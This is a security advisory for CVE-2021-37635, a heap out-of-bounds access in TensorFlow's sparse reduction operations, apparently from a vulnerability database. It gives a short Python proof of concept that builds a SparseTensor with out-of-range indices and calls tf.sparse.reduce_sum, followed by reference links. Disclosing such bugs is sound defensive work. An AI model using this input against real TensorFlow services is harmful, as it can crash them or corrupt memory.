CVE-2021-37635: Heap out of bounds access in sparse reduction operations
(updated )
The implementation of sparse reduction operations in TensorFlow can trigger accesses outside of bounds of heap allocated data:
import tensorflow as tf
x = tf.SparseTensor(
indices=[[773, 773, 773], [773, 773, 773]],
values=[1, 1],
dense_shape=[337, 337, 337])
tf.sparse.reduce_sum(x, 1)
References
- github.com/advisories/GHSA-cgfm-62j4-v4rf
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-548.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-746.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-257.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/87158f43f05f2720a374f3e6d22a7aaa3a33f750
- github.com/tensorflow/tensorflow/security/advisories/GHSA-cgfm-62j4-v4rf
- nvd.nist.gov/vuln/detail/CVE-2021-37635
Detect and mitigate CVE-2021-37635 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →